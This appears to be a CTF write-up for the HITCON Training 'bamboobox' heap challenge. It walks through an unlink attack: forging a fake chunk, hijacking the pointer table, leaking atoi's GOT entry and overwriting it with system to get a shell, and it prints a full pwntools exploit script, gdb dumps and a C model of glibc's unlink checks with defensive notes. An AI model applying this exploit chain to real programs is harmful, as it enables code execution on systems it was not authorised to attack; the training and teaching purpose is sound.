HITCON Training - bamboobox heap technique: unlink

Exploitation approach

  • Forge a fake free chunk inside chunk 0.
  • Trigger unlink so that the chunk 0 pointer is redirected into the memory that stores the chunk pointers (ptr-0x18).
  • Overwrite the chunk 0 pointer with the GOT address of atoi and leak it.
  • Overwrite the GOT entry of atoi with the address of system.
  • Send 'sh' as the input so that the call to atoi becomes system('sh') and yields a shell.

Exploitation process

add(0x40,'a' * 8)
add(0x80,'b' * 8)
add(0x80,'c' * 8)

ptr = 0x6020c8

fake_chunk = p64(0)
fake_chunk += p64(0x41)
fake_chunk += p64(ptr-0x18)
fake_chunk += p64(ptr-0x10)
fake_chunk += 'c'*0x20
fake_chunk += p64(0x40)
fake_chunk += p64(0x90)
edit(0,0x80,fake_chunk)

The prev_size field of chunk 1 is set to the size of the fake chunk (0x40) and the prev_inuse bit of chunk 1's size field is cleared (0x90). When chunk 1 is freed, the allocator therefore believes the chunk in front of it (the fake chunk) is free, consolidates backwards and unlinks it, which sets the ptr pointer to ptr-0x18.
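To make clear what the allocator verifies before it performs the pointer write described above, here is an added C model of the consistency checks in glibc's unlink (this is example code written for this page, not code from the writeup, the bamboobox binary or glibc itself; the names unlink_checked, build_free_chunk and the demo_* functions, and the simulated heap layout, are assumptions). It shows the two conditions that a freed chunk must satisfy, and which malformed chunks they reject.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal model of a 64-bit glibc malloc chunk header (hypothetical helper
   layout, used only to exercise the unlink checks). */
typedef struct chunk {
    uint64_t prev_size;      /* size of the previous chunk, valid only if it is free */
    uint64_t size;           /* own size; bit 0 is PREV_INUSE */
    struct chunk *fd;        /* forward link, valid only while the chunk is free */
    struct chunk *bk;        /* backward link, valid only while the chunk is free */
} chunk_t;

#define SIZE_BITS 7ULL
#define chunksize(p)  ((p)->size & ~SIZE_BITS)
#define next_chunk(p) ((chunk_t *)((char *)(p) + chunksize(p)))

/* Return codes mirror the messages glibc prints before aborting. */
enum unlink_result { UNLINK_OK = 0, UNLINK_BAD_SIZE = 1, UNLINK_BAD_LIST = 2 };

/* The checks glibc's unlink performs before splicing P out of its bin:
 *  1. chunksize(P) must equal the prev_size recorded in the chunk after P
 *     ("corrupted size vs. prev_size", added in glibc 2.26);
 *  2. P->fd->bk and P->bk->fd must both point back at P
 *     ("corrupted double-linked list", the classic safe-unlinking check).
 * Only when both hold does it write FD->bk = BK and BK->fd = FD. */
enum unlink_result unlink_checked(chunk_t *p)
{
    if (chunksize(p) != next_chunk(p)->prev_size)
        return UNLINK_BAD_SIZE;
    chunk_t *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return UNLINK_BAD_LIST;
    fd->bk = bk;
    bk->fd = fd;
    return UNLINK_OK;
}

/* Constructed simulated heap: chunk A (0x40 bytes, free, linked into a bin
   whose head is `bin`) followed by chunk B whose prev_size records A's size. */
static _Alignas(16) unsigned char heap[0x100];
static chunk_t bin;

chunk_t *build_free_chunk(void)
{
    memset(heap, 0, sizeof heap);
    chunk_t *a = (chunk_t *)heap;
    a->size = 0x40;
    chunk_t *b = next_chunk(a);
    b->prev_size = 0x40;     /* consistent with A's size */
    b->size = 0x90;          /* PREV_INUSE clear: B's predecessor is free */
    bin.fd = a; bin.bk = a;  /* doubly linked: head <-> A <-> head */
    a->fd = &bin; a->bk = &bin;
    return a;
}

/* A well-formed free chunk passes both checks. */
int demo_legit(void) { return unlink_checked(build_free_chunk()); }

/* fd/bk pointing at memory that does not point back are rejected. */
int demo_dangling_pointers(void)
{
    chunk_t *a = build_free_chunk();
    static chunk_t stray[2];         /* zero-initialised: stray[0].bk != a */
    a->fd = &stray[0];
    a->bk = &stray[1];
    return unlink_checked(a);
}

/* A size field that disagrees with the next chunk's prev_size is rejected. */
int demo_size_mismatch(void)
{
    chunk_t *a = build_free_chunk();
    next_chunk(a)->prev_size = 0x50; /* inconsistent with A's 0x40 */
    return unlink_checked(a);
}

int main(void)
{
    printf("well-formed chunk:   %d (0 = unlinked)\n", demo_legit());
    printf("dangling fd/bk:      %d (2 = corrupted double-linked list)\n", demo_dangling_pointers());
    printf("prev_size mismatch:  %d (1 = corrupted size vs. prev_size)\n", demo_size_mismatch());
    return 0;
}
```

The fake chunk in this writeup is built so that both conditions hold, which is why the allocator does not abort; the bug that makes that possible is the out-of-bounds write through edit (chunk 0 was allocated with 0x40 bytes but is edited with 0x80), and fixing that bounds check removes the whole chain. The later GOT overwrite additionally depends on the GOT being writable, which Full RELRO prevents. On a system where the checks do fire, a "corrupted double-linked list" or "corrupted size vs. prev_size" abort in the logs is the allocator catching a malformed chunk and is worth investigating as a possible memory-corruption attempt.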

gdb-peda$ x /20xg 0x250c020
0x250c020:	0x0000000000000000	0x0000000000000051 chunk 0
0x250c030:	0x0000000000000000	0x0000000000000041
0x250c040:	0x00000000006020b0	0x00000000006020b8
0x250c050:	0x6363636363636363	0x6363636363636363
0x250c060:	0x6363636363636363	0x6363636363636363
0x250c070:	0x0000000000000040	0x0000000000000090 chunk 1
0x250c080:	0x626262626262000a	0x000000000000000a
0x250c090:	0x0000000000000000	0x0000000000000000
0x250c0a0:	0x0000000000000000	0x0000000000000000
0x250c0b0:	0x0000000000000000	0x0000000000000000
remove(1)
payload = p64(0) * 2
payload += p64(0x40) + p64(0x602068)
edit(0,0x80,payload)

After chunk 1 is freed, the unlink has set ptr to ptr-0x18, so editing chunk 0 now writes into the chunk pointer table itself; the payload rewrites chunk 0's entry so that its pointer field holds 0x602068, the GOT entry of atoi.

show()
r.recvuntil("0 : ")
atoi_addr = u64(r.recvuntil(":")[:6].ljust(8,'\x00'))
libcbase = atoi_addr - libc.symbols['atoi']
print "libc:",hex(libcbase) 
system_addr = libcbase + libc.symbols['system']
print 'system:',hex(system_addr)

Leak the address of atoi and compute the address of system from it.

edit(0,0x8,p64(system_addr))
r.recvuntil(":")
r.sendline("sh")

Overwrite the GOT entry of atoi with the address of system, then send 'sh' so that the next call to atoi runs system("sh").

Get the flag.

Exploit script

from pwn_debug import *

#context.log_level = 'debug'
pdbg = pwn_debug('bamboobox')
pdbg.local()
pdbg.remote('node3.buuoj.cn',26510)
#libc = ELF('./x64_libc.so.6')
r = pdbg.run('remote')
libc = pdbg.libc

def add(length,name):
	r.recvuntil(":")
	r.sendline('2')
	r.recvuntil(':')
	r.sendline(str(length))
	r.recvuntil(":")
	r.sendline(name)

def edit(idx,length,name):
	r.recvuntil(':')
	r.sendline('3')
	r.recvuntil(":")
	r.sendline(str(idx))
	r.recvuntil(":")
	r.sendline(str(length))
	r.recvuntil(':')
	r.sendline(name)

def remove(idx):
	r.recvuntil(":")
	r.sendline("4")
	r.recvuntil(":")
	r.sendline(str(idx))

def show():
	r.recvuntil(":")
	r.sendline("1")


add(0x40,'a' * 8)
add(0x80,'b' * 8)
add(0x80,'c' * 8)

ptr = 0x6020c8

fake_chunk = p64(0)
fake_chunk += p64(0x41)
fake_chunk += p64(ptr-0x18)
fake_chunk += p64(ptr-0x10)
fake_chunk += 'c'*0x20
fake_chunk += p64(0x40)
fake_chunk += p64(0x90)
edit(0,0x80,fake_chunk)

#gdb.attach(r)

remove(1)
payload = p64(0) * 2
payload += p64(0x40) + p64(0x602068)
edit(0,0x80,payload)

#gdb.attach(r)

show()
r.recvuntil("0 : ")
atoi_addr = u64(r.recvuntil(":")[:6].ljust(8,'\x00'))
libcbase = atoi_addr - libc.symbols['atoi']
print "libc:",hex(libcbase) 
system_addr = libcbase + libc.symbols['system']
print 'system:',hex(system_addr)

edit(0,0x8,p64(system_addr))
#gdb.attach(r)

r.recvuntil(":")
r.sendline("sh")
r.interactive()

Source

https://github.com/bash-c/pwn_repo/blob/master/hitconTraining_bamboobox/bamboobox2.py

Posted on Sat, 16 May 2020 07:19:30 -0700 by herve